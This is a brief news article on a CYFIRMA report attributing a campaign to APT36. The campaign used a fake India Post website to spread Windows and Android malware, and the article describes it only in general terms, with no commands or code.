do son 
Image: CYFIRMA
A new cybersecurity report by CYFIRMA has uncovered a sophisticated cyberattack campaign targeting Indian users, allegedly orchestrated by a Pakistan-based advanced persistent threat (APT) group. The report details how the threat actors created a fraudulent website impersonating the Indian Post Office to distribute malware to both Windows and Android users.
The attackers employed a multi-pronged strategy to compromise their targets. According to CYFIRMA, the fraudulent website served different malicious payloads depending on the user’s device.
- For PC users, the site offered a PDF document containing “ClickFix” instructions. These instructions tricked users into executing a PowerShell command, potentially leading to system compromise.
- Mobile users were prompted to download an Android application named “indiapost[.]apk.” This malicious app requested extensive permissions and exfiltrated user data.
The Android app also promoted a “VivaGame” app and, while initially functional, it eventually prompted users to add bank card details to load money into a wallet to continue playing.
CYFIRMA’s analysis provides compelling evidence linking the attack to a Pakistan-based APT group, assessed with medium confidence as APT36.
- The report highlights that the PDF’s metadata indicates it was created in the same time zone as Pakistan, and the author is listed as “PMYLS,” referencing Pakistan’s Prime Minister Youth Laptop Scheme.
- Further investigation into the IP address from the PowerShell command revealed a domain associated with tactics commonly used by Pakistani APT groups.
- The India Post impersonating domain was registered in November 2024 which suggest a potential Pakistan-based attacker.
The CYFIRMA report identifies APT36, also known as Transparent Tribe, as the likely perpetrator. This group has a history of targeting Indian entities, including government organizations, military personnel, defense contractors, and educational institutions.
APT36’s tactics include spear-phishing emails, malicious attachments, and fake websites. The group utilizes various malware families, such as Crimson RAT, Poseidon, and ElizaRAT, and employs evasion techniques, including the use of cross-platform programming languages and abuse of popular web services for command-and-control communications.
